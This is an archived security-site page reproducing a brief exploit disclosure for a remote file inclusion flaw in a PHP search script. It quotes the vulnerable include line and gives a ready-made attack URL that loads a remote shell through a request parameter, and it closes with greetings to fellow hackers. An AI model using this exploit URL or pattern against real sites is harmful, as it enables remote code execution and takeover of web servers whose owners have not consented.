TUCoPS :: Web :: PHP :: bx1543.htm

Php Search Remote Inclusion
Php Search Remote Inclusion
Php Search Remote Inclusion


Script : PhpSearch =0D
Bug    : Remote File Inclusion=0D
Author : SekoMirza =0D
Company : http://www.hawkententerprises.org=0D 
Download : http://www.hawkenterprises.org/dev/phpsearch.zip=0D 
Dork : not yet=0D
_____________________________________________=0D
=0D
Where :=0D
phpsearch/utils/class_HTTPRetriever.php=0D
=0D
Bug : =0D
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);=0D
=0D
Explanation : =0D
if  class_HTTPRetriever.php is readable you can execute malicious code. =0D
=0D
Example : =0D
http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]=0D 
=0D
_____________________________________________=0D
=0D
Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM ,   and all hackers

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH